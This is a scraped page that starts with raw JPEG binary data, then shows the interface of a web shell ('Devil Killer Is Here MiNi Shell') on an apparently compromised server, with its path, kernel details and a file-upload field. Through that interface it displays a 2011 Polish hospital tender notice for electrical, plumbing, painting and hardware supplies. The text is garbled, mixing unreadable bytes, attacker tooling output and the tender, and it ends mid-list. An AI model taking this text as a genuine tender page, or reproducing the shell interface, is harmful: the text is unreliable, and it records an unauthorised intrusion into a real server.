JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110511/109164-N-2011.html

<p class="kh_header"><b>Poznań: Zakup (dostawa) materiałów eksploatacyjnych: elektrycznych, instalacyjnych, malarskich, ślusarsko - stolarskich oraz filtrów do wentylacji i klimatyzacji.</b><br>
<b>Numer ogłoszenia: 109164 - 2011; data zamieszczenia: 11.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Kliniczny Przemienienia Pańskiego Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Długa 1/2, 61-848 Poznań, woj. wielkopolskie, tel. 61 8549121, faks 61 8529472.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup (dostawa) materiałów eksploatacyjnych: elektrycznych, instalacyjnych, malarskich, ślusarsko - stolarskich oraz filtrów do wentylacji i klimatyzacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup (dostawa) materiałów eksploatacyjnych: elektrycznych, instalacyjnych, malarskich, ślusarsko - stolarskich oraz filtrów do wentylacji i klimatyzacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.50.00.00-1, 44.41.17.40-3, 44.11.17.00-8, 24.91.00.00-6, 42.91.35.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22  ust 1 spełniają warunki, dotyczące:
	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
	posiadania wiedzy i doświadczenia; 
	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
	sytuacji ekonomicznej i finansowej.
Na potwierdzenie spełnienia warunków, o których mowa w art. 22 ust. 1 Wykonawca dołączy do oferty  oświadczenie o spełnieniu tych warunków, zgodnie z art. 44 ustawy - zgodnie z wzorem oświadczenia, załącznik nr 3 do SIWZ,
Wykonawca zobowiązany jest również dołączyć do oferty:
             1) wypełniony Formularz ofertowy stanowiący załącznik nr 2 do SIWZ. Wykonawca w formularzu ofertowym uwzględni wszystkie elementy wymienione przez Zamawiającego w wzorze załącznika nr 2 do SIWZ.
             2)  Zamawiający na podstawie art. 36 ust. 4 żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom (w przypadku, gdy zachodzi taka sytuacja - dokument dołączyć do oferty przetargowej).
W przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania wykonawcy. 
       W przypadku, gdy Wykonawcy będą ubiegać się wspólnie o zamówienie publiczne ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, zgodnie z art. 23 ust. 2. Pełnomocnictwo  dołączyć do oferty. 
    Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, na podstawie art. 23 ust. 1, wykażą, brak podstaw do wykluczenia poprzez złożenie przez każdego z Wykonawców wymaganego dokumentu wymienionego w pkt 1.3. 
    Do wykonawców wspólnie ubiegających się o udzielenie zamówienia stosuje się odpowiednio przepisy dotyczące wykonawcy występującego samodzielnie. 
Zamawiający, przed zawarciem umowy w sprawie zamówienia publicznego może żądać od wykonawców, których oferta została wybrana, o których mowa w ust. 1, umowy regulującej współpracę tych wykonawców.  
     Wykonawca na żądanie zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1.
     Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,  w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  zamiast dokumentów, o których mowa w pkt 1.3 lit. b, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że:
 -  nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
               Dokumenty, o których mowa w pkt. 1.3. lit. b) powinny być wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.    
               Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w SIWZ cz. II pkt 1.3 lit. b, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkani</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana Umowy
Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

1.	Zmiana terminu dostawy 
a)	zmiany spowodowane siłą wyższą, w tym klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi zrealizowanie dostawy w terminie,
b)	zmiany będące następstwem okoliczności leżących wyłącznie po stronie Zamawiającego, w szczególności wstrzymanie dostawy,
c)	zmiany będące wynikiem czasowego wstrzymania produkcji towarów lub braków towarów na polskim rynku będących przedmiotem Umowy, w tym będące następstwem działania organów administracji publicznej,
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 lit. a)-c) termin dostawy może ulec odpowiedniemu przedłużeniu o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności.
 
2.	Zmiana sposobu spełnienia świadczenia 
a)	zmiany spowodowane nieprzewidywalną koniecznością dostawy towarów nie wymienionych w  Umowie. Zamawiający w powyższym przypadku dopuszcza zakup towarów zamiennych, równoważnych (np. towarów w zamiennym opakowaniu lub towarów o tożsamej nazwie międzynarodowej innego producenta o innej nazwie handlowej), ale ich cena nie może przewyższać ceny towarów podstawowych. Wykonawca zobowiązany jest dostarczyć go na zasadach określonych w niniejszej Umowie,
b)	zmiany spowodowane koniecznością zakupu niektórych towarów w większej ilości niż wymieniona Umowie. Zmiany powyższe możliwe są z równoczesnym zmniejszeniem ilościowym dostawy towarów pozostałych asortymentów,
c)	zmiany spowodowane nie wykupieniem pełnej ilości towarów.W powyższym przypadku Umowa może zostać przedłużona do czasu wykupienia pełnej ilości towarów określonych w Umowie.
3.	Zmiany wynagrodzenia Wykonawcy
a)	zmiany spowodowane udzieleniem przez Wykonawcę upustów promocyjnych. W przypadku udzielenia przez Wykonawcę upustów promocyjnych dla klienta w okresie trwania Umowy, upusty będą obowiązywały również dla tej Umowy,
b)	zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT lub podatku akcyzowego. Jeśli zmiana stawki VAT lub podatku akcyzowego będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT  lub podatku akcyzowego zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT lub podatku akcyzowego będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT lub podatku akcyzowego zapłaconego przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.skpp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Kliniczny Przemienienia Pańskiego Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu, ul. Długa ? Dział Zamówień Publicznych pokój 603.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2011 godzina 09:30, miejsce: Szpital Kliniczny Przemienienia Pańskiego Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu, ul. Długa ? Dział Zamówień Publicznych pokój 603.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały elektryczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Gniazdo ze stykiem ochronnym GWP230 B BINGO	50 szt.
2	Gniazdo ze stykiem ochronnym GWP130 B BINGO	30 szt.
3	Wtyczka 16 A 1 faz. z b.o. Prosta biała	50 szt.
4	Wtyczka 16 A 1 faz. z b.o. Kątowa biała	50 szt.
5	Przewód Ydy płaski 750 V 3x1,55 mm biały	500 mb
6	Przewód Ydy płaski 750 V 3x2,5 mm biały	300 mb
7	Przewód instalacji logicznych IEC 332-1	500 mb
8	Przewód telefoniczny słuchawkowy skręcany 1 mb HDD	20 szt.
9	Świetlówka TL-D Eco 32W/840 240V	1000 szt.
10	Świetlówka TL-D Super 80 18W/840 240V	1000 szt.
11	Świetlówka kompaktowa Softone 8W/827 E27 240V	500 szt.
12	Świetlówka kompaktowa Softone 20W/827 E27 240V	200 szt.
13	Żarówka halogen LH58 65W 24V z wtykiem męskim	50 szt.
14	Żarówka 60W 240V przeźroczysta	300 szt.
15	Żarówka 40W 240V przeźroczysta	100 szt.
16	Zapłonnik S2 (4-22W)	1000 szt.
17	Zapłonnik S-10 (4-65W)	500 szt.
18	Zapłonni S2E (18-22W)	100 szt.
19	Lampa rastrowa świetl. 4x18 W (do sufitów podwieszanych)	50 szt.
20	Lampa rastrowa świetl. 2x36 W (natynkowa)	10 szt.
21	Lampa plafon świetl. 1x11 W (natynkowa)	20 szt.
22	Bateria R-20 1,5 V alkaliczna	50 szt.
23	Bateria R-14 1,5 V alkaliczna	24 szt.
24	Bateria R-6 1,5 V alkaliczna	100 szt.
25	Bateria R-03 1,5 V alkaliczna	50 szt.
26	Bateria 6LR6 9V	10 szt.
27	Bateria 3R12 - 4,5 V płaska	5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.50.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały  instalacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bateria zlewozmywakowa ścienna	25 szt.
2.	Bateria umywalkowa   ścienna	30 szt.
3	Głowica baterii 	50 szt.
4	Silikon sanitarny biały	20 szt.
5	Bateria umywalkowa stojąca z mieszaczem	40 szt.
6	Bateria zlewozmywakowa stojąca z mieszaczem 	20 szt.
7	Korek 3 4 	20 szt.
8	Korek 1 2 	30 szt.
9	Zawór kątowy 1 2	30 szt.
10	Pakuły lniane 	5 szt.
11	Pokrętło z tworzywa 	70 szt.
12	Przedłużka 1 2	50 szt.
13	Przedłużka 3 4	15 szt.
14	Przyłącze elastyczne wc 	10 szt.
15	Mocowanie wc śrubowe 	15 szt.
16	Muszla wc-kompakt 	10 szt.
17	Kolano PCV 100wc 	5 szt.
18	Kolano kan.50 15 stopni 	15 szt.
19	Kolano kan. 50 45 stopni 	15 szt.
20	Kolano kan. 50 67 stopni 	15 szt.
21	Kolano kan. 50 87 stopni 	15 szt.
22	Kolano kan.50 30 stopni 	15 szt.
23	Kolano kan.100 30 stopni 	5 szt.
24	Kolano kan.100 15 stopni 	5 szt.
25	Bateria prysznicowa 	25 szt.
26	Zawór pływakowy do WC 3 8	15 szt.
27	Wąż do prysznica 	25 szt.
28	Zawór pływakowy do WC ? 	40 szt.
29	Wylewka 	35 szt.
30	Wąż w oplocie 1 2   - 50 cm	35 szt.
31	Wąż w oplocie 3 8  - 50 cm	30 szt.
32	Kolano ocynk.1 2	25 szt.
33	Kolano ocynk. wz 1 2	15szt.
34	Kolano ocynk.1 	5 szt.
35	Kolano ocynk.1 wz 	5 szt.
36	Kolano ocynk.3 4	10 szt.
37	Kolano ocynk.3 4 wz 	5 szt.
38	Nypel ocynk.1 2	25 szt.
39	Nypel ocynk.3 4 	10 szt.
40	Nypel ocynk.1	5 szt.
41	Mufa ocynk.1 2	10 szt.
42	Mufa ocynk.1	5 szt.
43	Mufa ocynk.3 4 	10 szt.
44	Dolnopłuk 	20 szt.
45	Wkład dolnopłuka 	20 szt.
46	Zestaw uszczelek dolnopłuka 	10 szt.
47	Uszczelki silikonowe do baterii 1 2 	300 szt.
48	Uszczelki silikonowe do głowic baterii 3 8	50 szt.
49	Uszczelki fibrowe 3 4 	100 szt.
50	Umywalka 55 	20 szt.
51	Syfon umywalkowy 	40 szt.
52	Syfon zlewozmywakowy pojedyńczy 	5 szt.
53	Syfon zlewozmywakowy podwójny 	5 szt.
54	Zawór kulowy 1 2 	20 szt.
55	Zawór kulowy 3 4 	5 szt.
56	Zawór kulowy 1 	5 szt.
57	Wkład uniwersalny do kompaktu 	25 szt.
58	Muszla ustępowa 	5 szt.
59	WC - kompakt. 	5 szt.
60	Zaślepka PCV 50 	10 szt.
61	Zaślepka PCV 100 	5 szt.
62	Śruby montażowe do umywalek	50 szt.
63	Zawór  kątowy 3 8	30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.17.40-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały  malarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cement portlandzki 	200 kg.
2.	Płytki ścienne  /wzór i kolor do uzgodnienia/	80 m^2
3	Krzyżaki 3mm 	20 op.
4	Narożnik aluminiowy 	100 szt.
5	Klej do płytek 	300 kg
6	Profil gięty 3m 	10 szt.
7	Klej montażowy 	30 szt.
8	Silikon akrylowy 	70 szt.
9	Silikon 100% 	20 szt.
10	Pianka montażowa 	15 szt.
11	Papier ścierny 	100 szt.
12	Papier na rzepy 	200 szt.
13	Uni-Grunt 	100 l
14	Masa samopoziomująca 	200 kg
15	Gips szpachlowy 	1500 kg
16	Tynk ręczny gipsowy klasy Rot band	400 kg
17	Płyta kart.-gipsowa 1200x2600x 12 wodoodporna	80 szt.
18	Klej gipsowy do płyt kart.-gipsowych	400 kg
19	Farba emulsyjna akrylowa - Akrylit W 	1300 l
20	Farba wew. lateksowa 	150 l
21	Farba chlorokauczukowa 	70 l
22	Gruntomal biały 	100 l
23	Kit elastyczny do okien 	20 kg
24	Farba akrylowa Akrylux biała 	150 l
25	Farba akrylowa /kolor/ 	20 l
26	Farba olejna czarna 	10 l
27	Farba olejna brąz. 	40 l
28	Farba olejna czerwona 	10 l
29	Farba olejna nieb. 	10 l
30	Farba olejna żółt. 	10 l
31	Barwnik MIX  /kolor/	250 szt.
32	Folia malarska gr 4x5m 	100 szt.
33	Folia malarska cienka 4x5m 	30 szt.
34	Impregnat do drewna zielony 	10 l
35	Rozpuszczalnik 	50 l
36	Zaprawa cementowa 20kg 	10 szt.
37	Pędzel okrągły 	60 szt.
38	Pędzel krzywik 	40 szt.
39	Pędzel ławkowiec 	16 szt.
40	Pędzel płaski 	40 szt.
41	Wałek malarski 	25 szt.
42	Wałek Moltopren perlon 	50 szt.
43	Szpachla malarska 	16 szt.
44	Kratka malarska duża 	10 szt.
45	Płytki podłogowe /wzór i kolor do uzgodnienia/	90 m^2
46	Skrobak 	12 szt.
47	Rączka do wałków 	10 szt.
48	Taśma antyrysowa 	30 szt.
49	Farba olejna zielona 	5 l
50	Farba olejna biała 	130 l
51	Kształtowniki stalowe profil. C 	40 szt.
52	Kształtowniki stalowe profil. U 	30 szt.
53	Folia w płynie 	30 l
54	Izolacja 	30 kg
55	Preparat izolacyjny antywilgociowy 	10 l
56	Taśma malarska o szer. 2cm	50 szt.
57	Taśma malarska o szer. 4 cm	50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.17.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Materiały ślusarsko - stolarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brzeszczoty do metalu 	2 op.
2.	Dętka 24x1 3/8 	8 szt.
3	Opona KP 200x50 	10 szt.
4	Opona 24x 1 3/8 	15 szt.
5	Dętka KP 200x50 	15 szt.
6	Gwoździe 	2 kg
7	Płyn naprawczy WD-40 	10 szt.
8	Gwoździe do betonu 	0,5 kg
9	Klucze płaskie oczkowe /kpl./	6 szt.
10	Klucz płaski 13	5 szt.
11	Kołek rozporowy 10	300 szt.
12	Kołek rozporowy 12	200 szt,
13	Kołek rozporowy 8	300 szt.
14	Kołek rozporowy 6	300 szt.
15	Kołek rozporowy 12 na klucz	100 szt.
16	Kołek rozporowy do płyty gipsowej	200 szt.
17	Kołek rozporowy 12x100	100 szt.
18	Kołek rozporowy 8x100	100 szt.
19	Kamień ścierny do szlifierki	4 szt.
20	Łatki do dętek	20 op.
21	Tarcza do metalu	20 szt.
22	Elektrody do spawania ER 3,25	2 op.
23	Elektrody do spawania ER 2,5	1 op.
24	Wkładki patentowe /mosiądz/	50 szt.
25	Zamek nawierzchniowy /patent. Mosiądz/	30 szt.
26	Zamek wpuszczany	40 szt.
27	Taśma dwustronna klejąca piankowa	20 szt.
28	Smar ŁT4	2 kg
29	Wkrętaki	6 kpl.
30	Szczypce uniwersalne	10 szt.
31	Koła do łóżek chorych	80 szt.
32	Kółka do foteli	100 szt.
33	Klej Poxipol	10 szt.
34	Klej Poxilina 	10 szt.
35	Klej do luster	30 szt.
36	Samozamykacz do drzwi 	10 szt.
37	Klej montażowy	30 szt.
38	Klej Butapren	4 kg
39	Zamek meblowy patentowy	100 szt.
40	Silikon szklarski	40 szt.
41	Klej do wykładzin	40 kg
42	Klej Wikol	5 kg
43	Kołki drewniane 6	1000 szt.
44	Kołki drewniane 8	1000 szt.
